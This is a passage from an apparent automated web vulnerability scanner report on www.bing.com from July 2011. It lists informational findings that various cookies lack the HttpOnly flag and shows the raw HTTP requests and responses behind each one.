Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865531&D=1865529&AF=MPSRCH; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; _FS=mkt=en-US
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 881
Date: Tue, 19 Jul 2011 12:11:11 GMT
Connection: keep-alive
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865531&D=1865529&AF=MPSRCH; expires=Thu, 18-Jul-2013 12:11:11 GMT; domain=.bing.com; path=/

<ul class="sw_a" id="sw_abarl"><li><a href="/search?q=Jonah+Hill" onmousedown="return si_T('&amp;ID=FD,4.1')">Web</a></li><li><a href="/news/search?q=Jonah+Hill&amp;qpvt=Jonah+Hill" onmousedown="retur
...[SNIP]...

8.18. http://www.bing.com/fd/InlineFeedbackHandler.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/InlineFeedbackHandler.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/InlineFeedbackHandler.aspx?IG=29ae479b70674c24adf680937cb5e176&CID=14230B4BB5064F8B9C1A3D1C2C91E937&IID=FD.1&WFID=wf11 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bing.com
Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=D=1865529&MS=1865529&AF=MPSRCH; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:34 GMT
Content-Length: 2459
Connection: keep-alive
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/

<div class="fbd" id="wf11"><div class="fbcontainer" id="wf11wdg1" style="display: none;"><form action="#" name="fb_formwf11wdg1"><table cellpadding="0" cellspacing="0" class="fbt" width="100%"><tbody>
...[SNIP]...

8.19. http://www.bing.com/fd/ls/GLinkPing.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/GLinkPing.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/GLinkPing.aspx?IG=33ba7e8b57514147a88c942f70994212&CID=14230B4BB5064F8B9C1A3D1C2C91E937&PM=Y&ID=FD,22.1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:09:22 GMT
Connection: close
Set-Cookie: _SS=SID=84364DCD717D4D0BB86135D1E06CC7AF; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865529; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=FA19F2A46E8B44F79C0D92A1E319533C; expires=Thu, 18-Jul-2013 12:09:22 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

8.20. http://www.bing.com/fd/ls/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/l?IG=0a2cf4887a3946bf9d66aedb51daf8c2&CID=14230B4BB5064F8B9C1A3D1C2C91E937&PM=Y&Type=Event.CPT&DATA={"pp":{"S":"L","PC":28,"FC":-1,"BC":28,"BS":45,"H":46,"FE":-1,"LE":-1,"C1":-1,"C2":-1,"BP":47,"KP":-1,"CT":606,"IL":2}}&P=SERP&DA=Bl2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:09:23 GMT
Connection: close
Set-Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865529; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1; expires=Thu, 18-Jul-2013 12:09:22 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

8.21. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/AppGalleryDisplayProvider.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/AppGalleryDisplayProvider.ashx?q=&mkt=en&FORM=BYLH HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4562
Content-Type: application/json; charset=utf-8
Expires: -1
X-BM-TraceID: 381b21893e064134838136a47cf10f1d
X-Ve-Server: BL2-01211-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:43 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1865529&MS=1865529&AF=BYLH; expires=Thu, 18-Jul-2013 12:09:42 GMT; domain=.bing.com; path=/

window.appGalleryContainerJSON = {"catUrl":"http://c0.ecn.catalogservice.virtualearth.net/cs/dc/pf/Catalog/676cd0b3-da60-4183-a07f-59d638480169_Catalog.xap.png","AppGalleryMarkup":"\r\n\r\n\u003cdiv i
...[SNIP]...

8.22. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/AppGalleryDisplayProvider.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/AppGalleryDisplayProvider.ashx?q=Jonah+Hill&mkt=en-US&FORM=BYFD HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865531&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4562
Content-Type: application/json; charset=utf-8
Expires: -1
X-BM-TraceID: e73c6b6f5dbd46658ecc67e88bfb7ca8
X-Ve-Server: BL2-01203-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001203
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:11:38 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: SRCHD=AF=BYFD&MS=1865531&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:11:38 GMT; domain=.bing.com; path=/

window.appGalleryContainerJSON = {"catUrl":"http://c0.ecn.catalogservice.virtualearth.net/cs/dc/pf/Catalog/676cd0b3-da60-4183-a07f-59d638480169_Catalog.xap.png","AppGalleryMarkup":"\r\n\r\n\u003cdiv i
...[SNIP]...

8.23. http://www.bing.com/maps/MapAppsScript.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/MapAppsScript.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/MapAppsScript.ashx?q=&mkt=en&FORM=BYLH HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
X-BM-TraceID: 45902850fb194154bf99af43b8d3f5ac
X-Ve-Server: BL2-01209-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001209
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1865529&MS=1865529&AF=BYLH; expires=Thu, 18-Jul-2013 12:09:42 GMT; domain=.bing.com; path=/
Content-Length: 6709

var slContainerText = "<div id='silverlightControlHost' style='height: 1px; width: 2px; top: 30px; left: 0px; position: absolute;'><object id='mapAppSL' data='data:application/x-silverlight-2,' type='
...[SNIP]...

8.24. http://www.bing.com/maps/MapAppsScript.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/MapAppsScript.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/MapAppsScript.ashx?q=&mkt=en-US&FORM=BYFD HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
X-BM-TraceID: ba10842c4078412f98876aba4f7bb278
X-Ve-Server: BL2-01204-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001204
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:10:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: SRCHD=AF=BYFD&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:10:00 GMT; domain=.bing.com; path=/
Content-Length: 6709

var slContainerText = "<div id='silverlightControlHost' style='height: 1px; width: 2px; top: 30px; left: 0px; position: absolute;'><object id='mapAppSL' data='data:application/x-silverlight-2,' type='
...[SNIP]...

8.25. http://www.bing.com/maps/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /maps/default.aspx?mkt=en-US&form=MPSRCH HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache,no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.bing.com
Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529&D=1865529&AF=MPSRCH; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719
Content-Length: 2657
Accept-Encoding: gzip, deflate

scriptManager=scriptManager%7cInvokeCategoryBrowser&__EVENTTARGET=InvokeCategoryBrowser&__EVENTARGUMENT=undefined&__VIEWSTATE=%2fwEPDwUJMTMyNzQzNzcxD2QWDGYPFgIeBFRleHQFCTxmZDpoZWFkPmQCBg8WAh8ABQo8L2Zk
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 717d213c93e1401590752582d6ba7a32
X-Ve-Server: BL2-01208-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:10:00 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865530&D=1865529&AF=MPSRCH; expires=Thu, 18-Jul-2013 12:10:00 GMT; domain=.bing.com; path=/
Content-Length: 11836

6516|updatePanel|TaskHost_Search|
   
                           <span id="TaskHost_SearchTaskPageContext" class="PageContext"><span id="TaskHost_TaskHost_Search_pt" style="display:none;"></span><
...[SNIP]...

8.26. http://www.bing.com/maps/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /maps/default.aspx?mkt=en&form=MPSRCH HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache,no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.bing.com
Content-Length: 2647
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

scriptManager=scriptManager%7cInvokeCategoryBrowser&__EVENTTARGET=InvokeCategoryBrowser&__EVENTARGUMENT=undefined&__VIEWSTATE=%2fwEPDwUJMTMyNzQzNzcxD2QWDGYPFgIeBFRleHQFCTxmZDpoZWFkPmQCBg8WAh8ABQo8L2Zk
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 0c13e1f5d3e94de590841c22ebc809c4
X-Ve-Server: BL2-01202-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001202
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1865529&MS=1865529&AF=MPSRCH; expires=Thu, 18-Jul-2013 12:09:31 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; expires=Thu, 18-Jul-2013 12:09:31 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:09:31 GMT; domain=.bing.com; path=/
Content-Length: 11829

6516|updatePanel|TaskHost_Search|
   
                           <span id="TaskHost_SearchTaskPageContext" class="PageContext"><span id="TaskHost_TaskHost_Search_pt" style="display:none;"></span><
...[SNIP]...

8.27. http://www.bing.com/news/s/news3B_c.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3B_c.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/s/news3B_c.css?v=1126040805 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=D=1865529&MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=2451BC32004969401AB2BE06044969F0&TUID=1; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css
Last-Modified: Fri, 26 Nov 2010 04:08:05 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 16909
Date: Tue, 19 Jul 2011 12:09:51 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=SM=1&D=1865529&MS=1865529&AF=NOFORM; expires=Thu, 18-Jul-2013 12:09:51 GMT; domain=.bing.com; path=/

.NewsAlertForm{position:absolute;color:#555;text-decoration:none;display:block;float:right;margin-top:100px;*margin-top:0;margin-right:0;z-index:100;top:75px;left:25px}.NewsAlertForm .AlertDropDownHea
...[SNIP]...

8.28. http://www.bing.com/news/s/news3B_c.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3B_c.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/s/news3B_c.js?v=0822204709 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Last-Modified: Sun, 22 Aug 2010 20:47:09 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 4228
Date: Tue, 19 Jul 2011 12:10:50 GMT
Connection: close
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:10:50 GMT; domain=.bing.com; path=/

var _ghlc=4;function _ghlp(a){return _ge("id_hlp_"+a)}function _ghlt(a){return _ge("id_hlt_"+a)}function _gishide(a){return a.style.display=="none"}function _gisshow(a){return!_gishide(a)}function _gs
...[SNIP]...

8.29. http://www.bing.com/news/s/news3S_c.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3S_c.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/s/news3S_c.css?v=1110024132 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529&SM=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css
Last-Modified: Wed, 10 Nov 2010 02:41:32 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 16722
Date: Tue, 19 Jul 2011 12:09:57 GMT
Connection: close
Set-Cookie: SRCHD=D=1865529&MS=1865529&SM=1&AF=NOFORM; expires=Thu, 18-Jul-2013 12:09:57 GMT; domain=.bing.com; path=/

.Content UL{margin:0;padding:0;list-style-type:none}.Content LI{display:block;list-style-type:none}.QueryAlterations{margin-bottom:.38em;padding-bottom:.38em;color:#333}.Header .QueryAlterations{borde
...[SNIP]...

8.30. http://www.bing.com/news/s/news3S_c.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3S_c.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/s/news3S_c.js?v=0829160238 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
